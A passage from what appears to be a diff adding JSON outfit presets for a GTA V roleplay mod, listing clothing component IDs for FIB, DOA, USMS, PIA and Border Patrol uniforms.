+"UnderCoat": "179:1", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "39:9", +"Armor": "23:1", +"Parachute": "29:1" + }, + { +"Name": "Female FIB Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "341:1", +"UpperSkin": "6:1", +"Decal": "1:1", +"UnderCoat": "218:1", +"Pants": "4:1", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "29:1" + }, + { +"Name": "Male FIB Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "32:2", +"Mask": "1:1", +"Top": "294:1", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "17:1", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "39:9", +"Armor": "23:1", +"Parachute": "29:1" + }, + { +"Name": "Male FIB Response", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "293:1", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "132:7", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "23:1", +"Parachute": "1:1" + }, + { +"Name": "Female FIB Response", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "367:1", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "162:7", +"Pants": "4:1", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "25:1", +"Parachute": "1:1" + }, + { +"Name": "Female FIB Agent", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "28:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "10:1", +"Pants": "4:1", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "25:1", +"Parachute": "1:1" + }, + { +"Name": "Male FIB Crime Scene Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "308:4", +"UpperSkin": "89:2", +"Decal": "1:1", +"UnderCoat": "179:1", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "39:9", +"Armor": "23:1", +"Parachute": "29:1" + }, + { +"Name": "Female Crime Scene Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "295:4", +"UpperSkin": "106:1", +"Decal": "1:1", +"UnderCoat": "105:17", +"Pants": "4:1", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "25:1", +"Parachute": "1:1" + }, + { +"Name": "Male FIB Field Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "32:3", +"Mask": "1:1", +"Top": "312:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "48:1", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "23:1", +"Parachute": "1:1" + }, + { +"Name": "Female FIB Field Agent", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:1", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "55:4", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "25:1", +"Parachute": "30:1" + }, + { +"Name": "Male FIB Field Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:4", +"UpperSkin": "7:1", +"Decal": "1:1", +"UnderCoat": "29:4", +"Pants": "48:1", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "23:1", +"Parachute": "1:1" + }, + { +"Name": "Female FIB Field Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:4", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "24:2", +"Pants": "90:7", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "25:1", +"Parachute": "1:1" + }, + { +"Name": "Male FIB Task Force", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "136:8", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "312:2", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "117:1", +"Pants": "48:1", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "8:3", +"Parachute": "69:1" + }, + { +"Name": "Female FIB Task Force", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "135:8", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "336:1", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "164:9", +"Pants": "55:4", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "25:1", +"Parachute": "1:1" + }, + { +"Name": "Male FIB Police Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:12", +"UpperSkin": "5:1", +"Decal": "41:1", +"UnderCoat": "38:1", +"Pants": "36:1", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "35:1" + }, + { +"Name": "Male FIB Police Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:12", +"UpperSkin": "5:1", +"Decal": "40:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "35:1" + }, + { +"Name": "Male FIB Police Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:12", +"UpperSkin": "12:1", +"Decal": "40:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "35:1" + }, + { +"Name": "Male FIB Police Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "150:6", +"UpperSkin": "5:1", +"Decal": "40:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "29:6", +"Parachute": "49:1" + }, + { +"Name": "Male FIB Police K9 Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:13", +"UpperSkin": "5:1", +"Decal": "40:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "21:10", +"Parachute": "21:1" + }, + { +"Name": "Male FIB Police K9 Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:13", +"UpperSkin": "12:1", +"Decal": "40:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "21:10", +"Parachute": "21:1" + }, + { +"Name": "Female FIB Police Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:12", +"UpperSkin": "4:1", +"Decal": "49:1", +"UnderCoat": "3:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "35:1" + }, + { +"Name": "Female FIB Police Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:12", +"UpperSkin": "4:1", +"Decal": "48:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "35:1" + }, + { +"Name": "Female FIB Police Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:12", +"UpperSkin": "10:1", +"Decal": "48:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "35:1" + }, + { +"Name": "Female FIB Police Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "147:6", +"UpperSkin": "4:1", +"Decal": "48:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:6", +"Parachute": "49:1" + }, + { +"Name": "Female FIB Police K9 Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:13", +"UpperSkin": "4:1", +"Decal": "48:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "24:10", +"Parachute": "21:1" + }, + { +"Name": "Female FIB Police K9 Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:13", +"UpperSkin": "3:1", +"Decal": "48:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "24:10", +"Parachute": "21:1" + }, + { +"Name": "Male FIB SWAT Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "40:1", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "221:6", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "117:1", +"Pants": "32:5", +"Shoes": "36:1", +"Accessories": "111:1", +"Armor": "26:4", +"Parachute": "49:1" + }, + { +"Name": "Female FIB SWAT Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "39:1", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "231:6", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "31:5", +"Shoes": "37:1", +"Accessories": "82:1", +"Armor": "28:4", +"Parachute": "49:1" + }, + { +"Name": "Male FIB HRT Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "40:2", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:5", +"Top": "221:7", +"UpperSkin": "142:20", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "38:3", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "26:7", +"Parachute": "49:1" + }, + { +"Name": "Female FIB HRT Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "FIB", +"Hat": "39:2", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:5", +"Top": "231:7", +"UpperSkin": "175:20", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "37:3", +"Shoes": "37:1", +"Accessories": "82:1", +"Armor": "28:7", +"Parachute": "49:1" + }, + { +"Name": "Male DOA Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:2", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:5", +"Pants": "11:4", +"Shoes": "11:1", +"Accessories": "1:1", +"Armor": "46:1", +"Parachute": "69:1" + }, + { +"Name": "Female DOA Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "25:5", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "40:1", +"Pants": "4:3", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "51:1", +"Parachute": "69:1" + }, + { +"Name": "Male DOA Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "38:3", +"Mask": "1:1", +"Top": "293:5", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "11:4", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "46:1", +"Parachute": "49:1" + }, + { +"Name": "Female DOA Agent", +"Gender": "Female", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "28:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "4:3", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "51:1", +"Parachute": "1:1" + }, + { +"Name": "Male DOA Response", +"Gender": "Male", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "38:3", +"Mask": "122:1", +"Top": "293:5", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "132:9", +"Pants": "11:4", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "46:1", +"Parachute": "49:1" + }, + { +"Name": "Female DOA Response", +"Gender": "Female", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "367:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "162:9", +"Pants": "4:3", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "51:1", +"Parachute": "1:1" + }, + { +"Name": "Male DOA Windbreaker", +"Gender": "Male", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:5", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:5", +"Pants": "11:4", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "46:1", +"Parachute": "1:1" + }, + { +"Name": "Female DOA Windbreaker", +"Gender": "Female", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:5", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "40:1", +"Pants": "4:3", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "51:1", +"Parachute": "1:1" + }, + { +"Name": "Male DOA Field Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "3:5", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "5:5", +"Shoes": "3:1", +"Accessories": "7:1", +"Armor": "46:1", +"Parachute": "1:1" + }, + { +"Name": "Female DOA Field Agent", +"Gender": "Female", +"Category": "EUP", +"Category2": "DOA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "15:8", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "90:7", +"Shoes": "63:21", +"Accessories": "7:1", +"Armor": "51:1", +"Parachute": "1:1" + }, + { +"Name": "Male DOA Task Force", +"Gender": "Male", +"Category": "EUP", +"Category2": "DOA", +"Hat": "136:11", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "3:5", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "134:11", +"Pants": "5:5", +"Shoes": "3:1", +"Accessories": "7:1", +"Armor": "46:1", +"Parachute": "1:1" + }, + { +"Name": "Female DOA Task Force", +"Gender": "Female", +"Category": "EUP", +"Category2": "DOA", +"Hat": "135:11", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "15:8", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "163:11", +"Pants": "90:7", +"Shoes": "63:21", +"Accessories": "7:1", +"Armor": "51:1", +"Parachute": "1:1" + }, + { +"Name": "Male DOA SRT Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "DOA", +"Hat": "151:1", +"Glasses": "27:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "221:5", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "104:1", +"Pants": "32:3", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "26:5", +"Parachute": "49:1" + }, + { +"Name": "Female DOA SRT Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "DOA", +"Hat": "150:1", +"Glasses": "29:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "231:5", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "31:3", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:5", +"Parachute": "49:1" + }, + { +"Name": "Male USMS Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "USMS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:5", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:5", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "14:1", +"Armor": "43:1", +"Parachute": "69:1" + }, + { +"Name": "Male USMS Marshal", +"Gender": "Male", +"Category": "EUP", +"Category2": "USMS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "349:5", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "43:1", +"Parachute": "1:1" + }, + { +"Name": "Male USMS Response", +"Gender": "Male", +"Category": "EUP", +"Category2": "USMS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "349:5", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "132:12", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "43:1", +"Parachute": "1:1" + }, + { +"Name": "Male USMS Windbreaker", +"Gender": "Male", +"Category": "EUP", +"Category2": "USMS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:8", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:5", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "18:8", +"Parachute": "63:1" + }, + { +"Name": "Male USMS Field Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "USMS", +"Hat": "136:15", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:8", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "134:14", +"Pants": "87:7", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "1:1", +"Parachute": "78:1" + }, + { +"Name": "Female USMS Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "USMS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "25:7", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "65:1", +"Pants": "4:2", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "45:1", +"Parachute": "1:1" + }, + { +"Name": "Female USMS Marshal", +"Gender": "Female", +"Category": "EUP", +"Category2": "USMS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "222:1", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "4:2", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "45:1", +"Parachute": "1:1" + }, + { +"Name": "Female USMS Response", +"Gender": "Female", +"Category": "EUP", +"Category2": "USMS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "333:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "162:12", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "45:1", +"Parachute": "1:1" + }, + { +"Name": "Female USMS Windbreaker", +"Gender": "Female", +"Category": "EUP", +"Category2": "USMS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "218:5", +"Pants": "4:2", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "45:1", +"Parachute": "29:11" + }, + { +"Name": "Female USMS Field Agent", +"Gender": "Female", +"Category": "EUP", +"Category2": "USMS", +"Hat": "135:15", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "336:7", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "164:14", +"Pants": "90:7", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "45:1", +"Parachute": "1:1" + }, + { +"Name": "Male PIA Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:11", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "36:1", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "36:1" + }, + { +"Name": "Male PIA Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:11", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "88:13", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "36:1" + }, + { +"Name": "Male PIA Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:11", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "36:1" + }, + { +"Name": "Male PIA Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "150:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "29:6", +"Parachute": "49:1" + }, + { +"Name": "Female PIA Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:11", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "35:1", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "36:1" + }, + { +"Name": "Female PIA Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:11", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "91:13", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "36:1" + }, + { +"Name": "Female PIA Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:11", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "91:13", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "36:1" + }, + { +"Name": "Female PIA Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "147:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:6", +"Parachute": "49:1" + }, + { +"Name": "Male PIA TRU Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "40:2", +"Glasses": "27:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "221:9", +"UpperSkin": "142:20", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "38:3", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "26:6", +"Parachute": "49:1" + }, + { +"Name": "Female PIA TRU Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "39:2", +"Glasses": "29:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "231:9", +"UpperSkin": "175:20", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "37:3", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:6", +"Parachute": "49:1" + }, + { +"Name": "Male Border Patrol Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "213:4", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "88:11", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:5" + }, + { +"Name": "Male Border Patrol Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "88:11", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:5" + }, + { +"Name": "Male Border Patrol Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "150:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:8", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "29:9", +"Parachute": "57:7" + }, + { +"Name": "Female Border Patrol Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "227:4", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "91:11", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:5" + }, + { +"Name": "Female Border Patrol Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "91:11", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:5" + }, + { +"Name": "Female Border Patrol Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "147:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:9", 